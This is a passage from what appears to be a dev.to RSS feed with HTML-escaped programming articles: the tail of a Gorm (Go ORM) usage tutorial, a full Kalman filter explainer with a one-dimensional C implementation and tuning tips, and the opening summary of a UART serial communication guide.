&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Using &lt;code&gt;Pluck&lt;/code&gt; for Single-Field Queries
&lt;/h4&gt;

&lt;p&gt;When only one column of data is needed, &lt;code&gt;Pluck&lt;/code&gt; is more intuitive than &lt;code&gt;Select&lt;/code&gt; + &lt;code&gt;Find&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;var ages []int64
// Equivalent to: db.Model(&amp;amp;User{}).Select("age").Find(&amp;amp;ages)
db.Model(&amp;amp;User{}).Pluck("age", &amp;amp;ages)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.3 Update Pitfalls to Avoid
&lt;/h3&gt;

&lt;p&gt;The most common pitfall in updates is “zero values not being updated”. Remember these two solutions:&lt;/p&gt;

&lt;h4&gt;
  
  
  Using &lt;code&gt;map&lt;/code&gt; to Update Zero Values
&lt;/h4&gt;

&lt;p&gt;Gorm does not update zero values in structs (e.g., &lt;code&gt;false&lt;/code&gt; for &lt;code&gt;bool&lt;/code&gt; types) by default. Use &lt;code&gt;map[string]interface{}&lt;/code&gt; to force updates:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Incorrect: Active: false is a zero value and will not be updated
db.Model(&amp;amp;user).Updates(User{ID: 111, Name: "hello", Active: false})

// Correct: Use map to force update all fields
db.Model(&amp;amp;user).Updates(map[string]interface{}{"id": 111, "name": "hello", "active": false})
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Using &lt;code&gt;Select&lt;/code&gt; to Specify Update Fields
&lt;/h4&gt;

&lt;p&gt;If you must use a struct, explicitly specify fields to update via &lt;code&gt;Select&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;db.Model(&amp;amp;user).Select("name", "active").Updates(User{ID: 111, Name: "hello", Active: false})
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.4 Safe Testing: The &lt;code&gt;DryRun&lt;/code&gt; Feature
&lt;/h3&gt;

&lt;p&gt;If you don’t have a test environment and fear dirty data from SQL errors, enable &lt;code&gt;DryRun&lt;/code&gt; mode. Gorm will print SQL without executing it, allowing pre-verification:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;db, err := gorm.Open(mysql.Open(dsn), &amp;amp;gorm.Config{DryRun: true, // Enable dry-run mode})
// Only prints SQL, no actual data deletion
db.Where("age &amp;lt; ?", 18).Delete(&amp;amp;User{})
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  4. Solutions to Common Gorm Issues
&lt;/h2&gt;

&lt;p&gt;Most exceptions encountered in development stem from insufficient understanding of Gorm details. Remember these high-frequency issues:&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 8-Hour Time Zone Discrepancy? Add &lt;code&gt;loc=Local&lt;/code&gt; to DSN
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Issue&lt;/strong&gt;: &lt;code&gt;time.Now()&lt;/code&gt; in code returns the current time, but the time stored in the database is 8 hours behind.&lt;strong&gt;Cause&lt;/strong&gt;: Gorm uses UTC time by default, while &lt;code&gt;time.Now()&lt;/code&gt; returns Beijing time (UTC+8), leading to an 8-hour difference.&lt;strong&gt;Solution&lt;/strong&gt;: Add &lt;code&gt;loc=Local&lt;/code&gt; to the DSN when initializing the &lt;code&gt;DB&lt;/code&gt; object to make Gorm use the system time zone:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// DSN format (key: add loc=Local at the end)
dsn := "root:password@tcp(127.0.0.1:3306)/dbname?charset=utf8mb4&amp;amp;parseTime=True&amp;amp;loc=Local"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.2 How to Implement Soft Deletion? Embed &lt;code&gt;DeletedAt&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Issue&lt;/strong&gt;: Want to “mark data as deleted without physically removing it”.&lt;strong&gt;Solution&lt;/strong&gt;: Embed &lt;code&gt;gorm.DeletedAt&lt;/code&gt; (or directly embed &lt;code&gt;gorm.Model&lt;/code&gt;) in the struct. Gorm will handle it automatically:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  On deletion: Executes &lt;code&gt;UPDATE users SET deleted_at = current_time WHERE ...&lt;/code&gt; (no physical deletion).&lt;/li&gt;
&lt;li&gt;  On query: Automatically adds &lt;code&gt;WHERE deleted_at IS NULL&lt;/code&gt; (excludes deleted data).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To query deleted data, use &lt;code&gt;Unscoped()&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Query all data, including deleted records
db.Unscoped().Find(&amp;amp;users)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.3 Transactions Are Not “Batched SQL Execution”—They Rely on Native Database Support
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Issue&lt;/strong&gt;: Assuming Gorm transactions “store SQL first and send it all on commit”, but results are returned immediately after &lt;code&gt;Select&lt;/code&gt;. Why?&lt;strong&gt;Truth&lt;/strong&gt;: Gorm transactions depend on native database support, with real-time interaction at each step:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;code&gt;tx := db.Begin()&lt;/code&gt;: Sends &lt;code&gt;START TRANSACTION&lt;/code&gt; to the database.&lt;/li&gt;
&lt;li&gt; &lt;code&gt;tx.Find(&amp;amp;user)&lt;/code&gt;: Sends &lt;code&gt;SELECT ...&lt;/code&gt; to the database and returns results in real time.&lt;/li&gt;
&lt;li&gt; &lt;code&gt;tx.Commit()&lt;/code&gt;: Sends &lt;code&gt;COMMIT&lt;/code&gt; to the database to confirm the transaction.&lt;/li&gt;
&lt;li&gt; If an error occurs, &lt;code&gt;tx.Rollback()&lt;/code&gt;: Sends &lt;code&gt;ROLLBACK&lt;/code&gt; to undo the transaction.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  4.4 Bulk Creation &amp;amp; Primary Key Conflict Handling
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Bulk Creation
&lt;/h4&gt;

&lt;p&gt;Use &lt;code&gt;CreateInBatches&lt;/code&gt; and specify a batch size (to avoid overly long SQL statements):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;var users []User
// Assume users contains 100 records
db.CreateInBatches(users, 50) // Insert in 2 batches of 50 records each
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Primary Key / Unique Key Conflict Handling
&lt;/h4&gt;

&lt;p&gt;Use &lt;code&gt;clause.OnConflict&lt;/code&gt; to specify a conflict strategy. Gorm will generate an &lt;code&gt;ON DUPLICATE KEY UPDATE&lt;/code&gt; statement (logic implemented by the database):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Update all fields on conflict
db.Clauses(clause.OnConflict{UpdateAll: true}).CreateInBatches(&amp;amp;users, 50)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Gorm’s core is “encapsulating SQL logic into Go methods”. Understanding core objects like &lt;code&gt;DB&lt;/code&gt; and &lt;code&gt;Statement&lt;/code&gt; allows you to master its execution workflow. Practical techniques (e.g., &lt;code&gt;embed&lt;/code&gt;, &lt;code&gt;Pluck&lt;/code&gt;, &lt;code&gt;DryRun&lt;/code&gt;) and pitfall avoidance (time zone discrepancies, zero-value updates) require practice in real-world scenarios.&lt;/p&gt;

</description>
      <category>go</category>
      <category>sql</category>
    </item>
    <item>
      <title>Kalman Filter Algorithm: Core Principles, Advantages, Applications, and C Code Implementation</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Sat, 01 Nov 2025 07:42:23 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/kalman-filter-algorithm-core-principles-advantages-applications-and-c-code-implementation-55mf</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/kalman-filter-algorithm-core-principles-advantages-applications-and-c-code-implementation-55mf</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;This article provides a comprehensive breakdown of the Kalman Filter algorithm, covering everything from its core concepts to practical applications, and serves as a complete reference for both engineering development and theoretical learning. It first clarifies the recursive nature of the Kalman Filter—centered on the “fusion of prediction and observation”—then analyzes its key advantages in detail, such as efficient real-time processing, optimal estimation under Gaussian assumptions, and multi-source information fusion. At the same time, it highlights limitations including dependence on linearity and Gaussianity, sensitivity to model parameters, and increased computational complexity in high-dimensional spaces. This helps readers accurately assess the scenarios where the algorithm is best suited.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/kalman-filter-algorithm-core-principles-advantages-applications-and-c-code-implementation.html" rel="noopener noreferrer"&gt;Dev Resource Hub&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The Kalman Filter algorithm revolves around a core concept: fusing predictive estimates with real-world observations. Using a recursive framework, it computes optimal state estimates even when dealing with system uncertainty.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Advantages and Limitations of the Kalman Filter
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Advantages
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Efficient Recursion&lt;/strong&gt;: It operates with low computational overhead, requiring only the current-time estimate and measurement data—no need to store large volumes of historical information. This makes it ideal for real-time processing tasks.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Optimal Estimation&lt;/strong&gt;: When the system is linear and noise follows a Gaussian distribution, the Kalman Filter delivers statistically optimal results, specifically minimum variance estimates.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Robust Noise Handling&lt;/strong&gt;: It effectively mitigates random noise in both system dynamics (e.g., unmodeled disturbances) and sensor measurements (e.g., sensor drift).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Native Multi-Sensor Fusion&lt;/strong&gt;: It is inherently designed for integrating data from multiple sensors, leveraging the strengths of each (e.g., high precision from one, high update rate from another) to produce more reliable estimates.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Limitations
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Linear and Gaussian Assumptions&lt;/strong&gt;: The standard Kalman Filter relies on two key assumptions: the system’s dynamic and observation models must be linear, and both process noise (system uncertainty) and observation noise (sensor uncertainty) must be Gaussian white noise. In practice, many real-world systems exhibit non-linear behavior, which violates this constraint.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Model Sensitivity&lt;/strong&gt;: Filter performance is heavily dependent on the accuracy of the system model (defined by matrices F and H) and noise statistics (covariance matrices Q and R). Poorly tuned parameters can lead to biased estimates or even filter divergence (where estimates grow increasingly inaccurate over time).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Dimensionality Scaling Issues&lt;/strong&gt;: For high-dimensional state spaces, the computational cost of matrix operations (e.g., multiplication, inversion) increases significantly, potentially limiting its use in resource-constrained systems.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  2. Application Areas of the Kalman Filter
&lt;/h2&gt;

&lt;p&gt;Thanks to its low computational footprint, the Kalman Filter is widely adopted in scenarios where real-time performance is critical.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Application Field&lt;/th&gt;
&lt;th&gt;Specific Use Cases&lt;/th&gt;
&lt;th&gt;Role of the Kalman Filter&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Target Tracking&lt;/td&gt;
&lt;td&gt;Radar-based tracking, video surveillance, vehicle/pedestrian tracking in autonomous driving&lt;/td&gt;
&lt;td&gt;Predicts the target’s next position, fuses multi-sensor data (e.g., radar and camera feeds), smooths erratic trajectories, and refines estimates of position, velocity, and acceleration.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Motor Control &amp;amp; Filtering&lt;/td&gt;
&lt;td&gt;Servo motor feedback control, robotic joint actuation, UAV rotor speed regulation (e.g., STM32-based motor speed sensing)&lt;/td&gt;
&lt;td&gt;Filters noise from encoder feedback signals to improve motor speed and position estimates; integrates data from current sensors to enable precise state monitoring and closed-loop control.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Navigation &amp;amp; Positioning&lt;/td&gt;
&lt;td&gt;UAV navigation, autonomous vehicle localization, mobile robot guidance, smartphone GPS/IMU fusion&lt;/td&gt;
&lt;td&gt;Serves as the backbone for multi-sensor fusion. For example, it combines GPS data (which provides absolute position but has slow update rates and noise) with IMU (Inertial Measurement Unit) data (high update rates but suffers from error accumulation over time) to deliver continuous, high-precision position, velocity, and attitude estimates.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Signal Processing &amp;amp; Economic Forecasting&lt;/td&gt;
&lt;td&gt;Removing noise from time-series signals (e.g., sensor readings), stock price forecasting, macroeconomic indicator analysis&lt;/td&gt;
&lt;td&gt;Extracts underlying trends from noisy time-series data; uses historical patterns to generate short-term predictions for financial or economic variables.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Aerospace&lt;/td&gt;
&lt;td&gt;Satellite orbit determination, missile guidance systems, aircraft attitude control&lt;/td&gt;
&lt;td&gt;Computes precise estimates of aircraft/satellite position, velocity, and orientation—critical for maintaining stable navigation and control in dynamic aerospace environments.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  3. Kalman Filter Example Demonstration
&lt;/h2&gt;

&lt;p&gt;The Kalman Filter’s combination of low computational cost, clear performance benefits, and no need for historical data storage makes it well-suited for real-time signal processing. The figure below compares the raw motor speed data (blue curve) with the Kalman-filtered speed data (orange curve) from a typical motor operation test. The filtered curve clearly reduces noise while preserving the underlying speed trend.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Kalman Filter Principles: 5 Core Equations
&lt;/h2&gt;

&lt;p&gt;The Kalman Filter operates in two repeating phases—prediction and update—governed by five key equations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  State Prediction Equation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fck91ikrjo7vk2wrnt864.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fck91ikrjo7vk2wrnt864.png" width="408" height="31"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Error Covariance Prediction Equation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa7e7lu7uyfu1dmhw135b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa7e7lu7uyfu1dmhw135b.png" width="390" height="32"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Kalman Gain Calculation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F68tdzhf829gv6txt72sr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F68tdzhf829gv6txt72sr.png" width="257" height="57"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  State Update Equation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtf365pyp0x257hnax5c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtf365pyp0x257hnax5c.png" width="458" height="38"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Error Covariance Update Equation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdqvnaqwjli5a3d5ljisz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdqvnaqwjli5a3d5ljisz.png" width="301" height="28"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Below is a complete C language implementation based on these equations:&lt;/p&gt;




&lt;p&gt;**&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;float Kalman_Filter(Kalman* p, float dat)
{if (!p) return 0; // Guard clause: return 0 if the Kalman structure pointer is null

    // Prediction phase: Estimate current state based on previous state
    p-&amp;gt;X = p-&amp;gt;A * p-&amp;gt;X_last;                  // Predict current state (prior estimate)
    p-&amp;gt;P = p-&amp;gt;A * p-&amp;gt;P_last + p-&amp;gt;Q;            // Predict error covariance of the prior estimate

    // Update phase: Correct prior estimate with new measurement data
    p-&amp;gt;kg = p-&amp;gt;P / (p-&amp;gt;P + p-&amp;gt;R);              // Calculate Kalman gain (weighting factor)
    p-&amp;gt;X_now = p-&amp;gt;X + p-&amp;gt;kg * (dat - p-&amp;gt;X);    // Update state to get posterior estimate
    p-&amp;gt;P_now = (1 - p-&amp;gt;kg) * p-&amp;gt;P;             // Update error covariance of the posterior estimate

    // Prepare for next iteration: Pass current posterior estimates to next time step
    p-&amp;gt;P_last = p-&amp;gt;P_now;
    p-&amp;gt;X_last = p-&amp;gt;X_now;

    return p-&amp;gt;X_now; // Return the final filtered state estimate
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Explanation of Variables in the &lt;code&gt;Kalman&lt;/code&gt; Structure
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;A&lt;/strong&gt;: State transition matrix (or scalar coefficient in 1D cases) that defines how the system state evolves over time.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Q&lt;/strong&gt;: Process noise covariance matrix (or scalar) that quantifies uncertainty in the system model (e.g., unmodeled friction in a motor).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;R&lt;/strong&gt;: Observation noise covariance matrix (or scalar) that quantifies uncertainty in sensor measurements (e.g., noise in an encoder reading).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;X_last&lt;/strong&gt;: Posterior state estimate from the previous time step (denoted as k-1|k-1), representing the optimal estimate after incorporating the last measurement.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;P_last&lt;/strong&gt;: Error covariance matrix from the previous time step (k-1|k-1), quantifying uncertainty in &lt;code&gt;X_last&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;X&lt;/strong&gt;: Prior state prediction for the current time step (k|k-1), estimated using only the system model (no measurement data yet).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;P&lt;/strong&gt;: Error covariance of the prior prediction (k|k-1), quantifying uncertainty in &lt;code&gt;X&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;kg&lt;/strong&gt;: Kalman gain (scalar in 1D cases) that balances the trust between the prior prediction (&lt;code&gt;X&lt;/code&gt;) and the new measurement (&lt;code&gt;dat&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;X_now&lt;/strong&gt;: Posterior state estimate for the current time step (k|k), the final filtered output after incorporating the new measurement.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;P_now&lt;/strong&gt;: Error covariance of the posterior estimate (k|k), quantifying uncertainty in &lt;code&gt;X_now&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  5. Step-by-Step Interpretation: Kalman Filter Logic vs. C Code
&lt;/h2&gt;

&lt;h3&gt;
  
  
  (1) Prediction Phase
&lt;/h3&gt;

&lt;p&gt;The prediction phase uses the system model to estimate the current state and its uncertainty, without any measurement data.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;p-&amp;gt;X = p-&amp;gt;A * p-&amp;gt;X_last;&lt;/code&gt;This line computes the &lt;strong&gt;prior state prediction&lt;/strong&gt;. It extrapolates the previous optimal estimate (&lt;code&gt;X_last&lt;/code&gt;) forward in time using the state transition model (&lt;code&gt;A&lt;/code&gt;). For example, if &lt;code&gt;A = 1&lt;/code&gt; (a stationary system like a constant motor speed), this simplifies to &lt;code&gt;X = X_last&lt;/code&gt;—the predicted speed equals the previous optimal speed. Note: This code omits the control input term (BU(k)) for simplicity (common in 1D systems with no external control).&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;p-&amp;gt;P = p-&amp;gt;A * p-&amp;gt;P_last + p-&amp;gt;Q;&lt;/code&gt;This line computes the &lt;strong&gt;prior error covariance&lt;/strong&gt;. The term &lt;code&gt;A * P_last&lt;/code&gt; propagates the uncertainty from the previous step forward in time. The process noise &lt;code&gt;Q&lt;/code&gt; is added to account for new uncertainty introduced by the system model (e.g., sudden changes in load on a motor). In 1D cases, the transpose of &lt;code&gt;A&lt;/code&gt; (Aᵀ) is equal to &lt;code&gt;A&lt;/code&gt; (since it’s a scalar), so the full matrix equation (A * P_last * Aᵀ + Q) simplifies to the code above.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  (2) Update Phase
&lt;/h3&gt;

&lt;p&gt;The update phase incorporates the new measurement to correct the prior prediction, producing a more accurate posterior estimate.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;p-&amp;gt;kg = p-&amp;gt;P / (p-&amp;gt;P + p-&amp;gt;R);&lt;/code&gt;This line calculates the &lt;strong&gt;Kalman gain&lt;/strong&gt;, the filter’s “trust balance” between prediction and measurement:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  If &lt;code&gt;R&lt;/code&gt; is large (unreliable sensor), the denominator grows, making &lt;code&gt;kg&lt;/code&gt; small. The filter trusts the prior prediction (&lt;code&gt;X&lt;/code&gt;) more.&lt;/li&gt;
&lt;li&gt;  If &lt;code&gt;P&lt;/code&gt; is large (unreliable model), the numerator grows, making &lt;code&gt;kg&lt;/code&gt; close to 1. The filter trusts the new measurement (&lt;code&gt;dat&lt;/code&gt;) more.In 1D systems, the observation matrix &lt;code&gt;H&lt;/code&gt; (which maps states to measurements) is typically 1, so the full gain equation (P * Hᵀ * (HPHᵀ + R)⁻¹) simplifies to the scalar division here.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;code&gt;p-&amp;gt;X_now = p-&amp;gt;X + p-&amp;gt;kg * (dat - p-&amp;gt;X);&lt;/code&gt;This line computes the &lt;strong&gt;posterior state estimate&lt;/strong&gt;—the core of the Kalman Filter. The term &lt;code&gt;(dat - p-&amp;gt;X)&lt;/code&gt; is the &lt;strong&gt;measurement residual&lt;/strong&gt; (or “innovation”), representing the difference between what the sensor measured (&lt;code&gt;dat&lt;/code&gt;) and what the model predicted (&lt;code&gt;X&lt;/code&gt;). The Kalman gain &lt;code&gt;kg&lt;/code&gt; weights this residual: a large &lt;code&gt;kg&lt;/code&gt; means the residual has a big impact on the final estimate (trust the measurement), while a small &lt;code&gt;kg&lt;/code&gt; means the residual has little impact (trust the prediction).&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;code&gt;p-&amp;gt;P_now = (1 - p-&amp;gt;kg) * p-&amp;gt;P;&lt;/code&gt;This line updates the &lt;strong&gt;error covariance&lt;/strong&gt; to reflect the reduced uncertainty after incorporating the measurement. Since we now have more information (the new measurement), &lt;code&gt;P_now&lt;/code&gt; will always be smaller than &lt;code&gt;P&lt;/code&gt;—the term &lt;code&gt;(1 - p-&amp;gt;kg)&lt;/code&gt; ensures this reduction. In 1D cases, the identity matrix &lt;code&gt;I&lt;/code&gt; (used in the full matrix equation: (I – kg*H)*P) is 1, so the code simplifies to the scalar form above.&lt;/p&gt;&lt;/li&gt;

&lt;/ul&gt;

&lt;h3&gt;
  
  
  (3) Preparing for the Next Iteration
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;p-&amp;gt;P_last = p-&amp;gt;P_now;&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;p-&amp;gt;X_last = p-&amp;gt;X_now;&lt;/code&gt;These lines “pass forward” the current posterior estimates (&lt;code&gt;X_now&lt;/code&gt; and &lt;code&gt;P_now&lt;/code&gt;) to become the “previous” estimates (&lt;code&gt;X_last&lt;/code&gt; and &lt;code&gt;P_last&lt;/code&gt;) for the next time step. This recursive handoff is what allows the filter to run continuously, updating estimates as new measurements arrive.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  6. Key Takeaways and Tuning Tips
&lt;/h2&gt;

&lt;p&gt;A 1D Kalman Filter uses the prediction-update cycle to recursively fuse model-based predictions with sensor measurements, delivering optimal state estimates in uncertain environments.&lt;/p&gt;

&lt;p&gt;The performance of the filter hinges on tuning two critical parameters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Process Noise Covariance (Q)&lt;/strong&gt; : Think of &lt;code&gt;Q&lt;/code&gt; as your “trust in the system model.” If your model is imprecise (e.g., a motor with variable friction), increase &lt;code&gt;Q&lt;/code&gt;—this makes the filter rely more on sensor measurements to correct errors. If your model is highly accurate, decrease &lt;code&gt;Q&lt;/code&gt;—the filter will trust the model’s predictions more.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Observation Noise Covariance (R)&lt;/strong&gt; : Think of &lt;code&gt;R&lt;/code&gt; as your “trust in the sensor.” If the sensor is noisy (e.g., an old encoder with erratic readings), increase &lt;code&gt;R&lt;/code&gt;—the filter will downweight the measurement and trust the model more. If the sensor is precise (e.g., a high-quality laser encoder), decrease &lt;code&gt;R&lt;/code&gt;—the filter will prioritize the measurement.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tuning &lt;code&gt;Q&lt;/code&gt; and &lt;code&gt;R&lt;/code&gt; is rarely a one-time task. Typically, you’ll adjust these parameters through iterative testing: start with small values, monitor filter performance (e.g., how well the filtered curve tracks the true state), and refine until the filter balances noise reduction and responsiveness.&lt;/p&gt;

</description>
      <category>kalmanfilter</category>
    </item>
    <item>
      <title>UART Serial Communication Guide: Principles, Parsing &amp; Visualization</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Fri, 31 Oct 2025 11:52:35 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/uart-serial-communication-guide-principles-parsing-visualization-5ack</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/uart-serial-communication-guide-principles-parsing-visualization-5ack</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;A complete guide to UART serial communication: Learn underlying principles, protocol parsing with state machines, ECharts visualization, and fix garble/loss. Ideal for embedded &amp;amp; IoT engineers.&lt;/p&gt;
&lt;/blockquote&gt;

